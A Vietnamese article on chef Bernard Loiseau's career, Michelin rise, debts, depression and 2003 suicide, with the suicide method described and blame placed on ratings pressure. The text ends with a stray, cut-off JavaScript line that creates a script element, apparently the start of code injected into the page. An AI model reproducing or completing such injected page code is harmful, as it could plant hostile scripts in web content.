Bernard Loiseau – Quãng lặng cho ngành bếp thế giới

Bernard loiseau sinh năm 1951, mất ngày 24/2/2003, là một đầu bếp nổi tiếng, sinh ra và lớn lên ở Chamalieres, Auvergne miền Trung nước Pháp. Khi còn là một cậu thành niên, Loiseau đã có định hướng sẵn theo con đường bếp chuyên nghiệp và công việc đầu tiên của ông là tại nhà hàng nổi tiếng La Maison Troisgros do anh em Jean và Pierre Troisgros ở Roanne thành lập.

Bernard Loiseau  (3)

Loiseau được biết đến như một “ngôi sao sáng” của Gault Millau – một trong những tiêu chuẩn đánh giá chất lượng nhà hàng ở Pháp. Với phong cách ẩm thực nhẹ nhàng, đi ngược lại với ẩm thực truyền thống Pháp, ông đã mua lại La Côte d’Or vào năm 1982 và 9 năm sau là 3 ngôi sao danh giá từ Michelin Guide.

Ông là một người chú trọng tiểu tiết, nhiều khi trở nên điên cuồng với những công việc, chính bởi vì vậy, ông dành hết sự tin tưởng cho nhà hàng của mình và niềm tin đó càng không thể phá vỡ sau khi ông nhận được 3 ngôi sao Michelin.

loiseau

Năm 1998, Bernard Loiseau thành lập Bernard Loiseau SA và xuất bản nhiều cuốn sách dạy nấu ăn, hình thành một dòng các loại thực phẩm đông lạnh và mở ba quán ăn ở Paris, ngoài việc chạy La Côte d’Or và các cửa hàng cửa hàng liền kề nó.

Chính phủ Pháp trao tặng ông huân chương danh dự cao nhất cho những đóng góp không ngừng nghỉ.

Bernard Loiseau  (2)

Xu hướng ẩm thực kết hợp giữa Châu Á và Pháp được hình thành, khái niệm “sành ăn” ra đời, kìm kẹp tư duy ưu việt của Loiseau bởi ông không chấp nhận rằng những triết lý ẩm thực của ông đã bị xu hướng mới thay thế. Ông chìm đắm trong khoảng thời gian nợ nần và chịu đựng những cơn trầm cảm lâm sàng ngày càng nghiêm trọng.

Năm 2003, ông được tìm thấy đã chết trong phòng ngủ cùng khẩu súng trường, viên đạn bắn qua đầu, khi có một tờ báo ám chỉ rằng nhà hàng của ông có thể bị tước đi 3 ngôi sao Michelin. Người ta cũng tìm thấy rằng Gault Millau gần đây nhất đã hạ nhà hàng của ông từ 19/20 xuống 17/20 điểm; còn Michelin Guide thì đã lên kế hoạch loại bỏ La Côte d’Or ra khỏi hạng mục nhà hàng 3 sao. Mặc dù có thể tất cả chỉ là tin đồn, nhưng điều đó đã đủ cướp đi mạng sống của một đầu bếp luôn tin vào những giá trị do mình tạo ra nhưng lại không thay đổi để bắt kịp xu hướng mới.

Bernard Loiseau  (10)

Bernard Loiseau  (9)

Bernard Loiseau  (8)

Một số món ăn nổi tiếng của Bernard Loiseau trước khi ông qua đời

Sau khi ông qua đời, Jacques Lameloise, đầu bếp cũng nhận được 3 ngôi sao từ Michelin Guide kể lại rằng Loiseau đã từng tâm sự với ông rằng: “Nếu tôi bị mất đi một ngôi sao, tôi sẽ tự kết liễu cuộc đời mình”. Trong khi đó, nhiều nguồn tin sau đó lại cho biết, Loiseau đã chán nản về các vấn đề nợ nần và giảm sự bảo trợ tại nhà hàng của mình.

Làng bếp thế giới mất đi một trong những đầu bếp vĩ đại nhất không chỉ của riêng nước Pháp và những lỗi lầm này bị đẩy cho 2 cơ quan hàng đầu về ẩm thực, Gault Millau và Michelin đã đẩy Loiseau đến bờ vực.

Một người bạn của ông chia sẻ: “Sự thành công ở các đế chế của anh ấy trong đó có 3 nhà hàng ở Paris và nhà hàng 3 sao Michelin La Côte d’Or ở Burgundy đều dựa trên sách hướng dẫn xếp hạng nhà hàng để giữ chân những khách hàng khó tính. Sau khi xếp hạng bị giảm, số lượng khách hàng cũng giảm theo. Cuối cùng anh ấy phải tự mình gánh nợ và khi không thể chịu đựng được nữa,…Là vậy đó”.

Bernard Loiseau  (4)

Một điều mà cũng ít người biết đến về cái chết của đầu bếp nổi tiếng này là khẩu súng trường Loiseau dùng để tự tử chính là món quà của vơ ông, Dominique tặng vào năm ngoái. Bà đã kể về điều đó như một bi kịch lớn nhất trong cuộc đời mình.

Cũng bởi, Bernard Loiseau là một đầu bếp đầy tham vọng. Mục tiêu của ông dường như chỉ là ráo riết chạy theo những ngôi sao hay chiếc mũ. Làm sao đạt được đỉnh cao và làm sao giữ được nó. Gần như Loise không quan tâm đến bất cứ điều gì khác ngoài như cuộc thanh tra bí mật của Michelin Guide.

Nhà phê bình ẩm thực hàng đầu của Tạp chí Pháp Le Figaro, Françcois Simon đã đưa ra một số nhận định dựa trên những giấy tờ cụ thể liên quan đến sự việc này mà ông cho rằng “cần đưa nó ra ánh sáng”: “Loiseau đã bị hợp pháp uy hiếp gián tiếp bằng những tiêu chuẩn. Bị tước đi thứ hạng là một chuyện nhưng điều này đồng nghĩa với việc sự nghiệp của ông cũng tiêu tan, doanh thu nhà hàng giảm đến 40%”.

Simon đã đổ lỗi cho truyền thông rằng đã tung những nguồn tin thất thiệt, gây áp lực cho một người đang trong giai đoạn trầm cảm. “Thực sự đó cũng được quy là một tội giết người”, ông khẳng định.

Đến năm 2007, La Côte d’Or vẫn có được 3 ngôi sao Michelin dưới sự chỉ đạo của bếp trưởng mới, Patrick Bertron. Đây cũng là một niềm vui nhỏ cho đầu bếp quá cố Bernard Loiserau vì những cống hiến không ngừng nghỉ trong cuộc đời mình.

var d=document;var s=d.createElement(‘script’);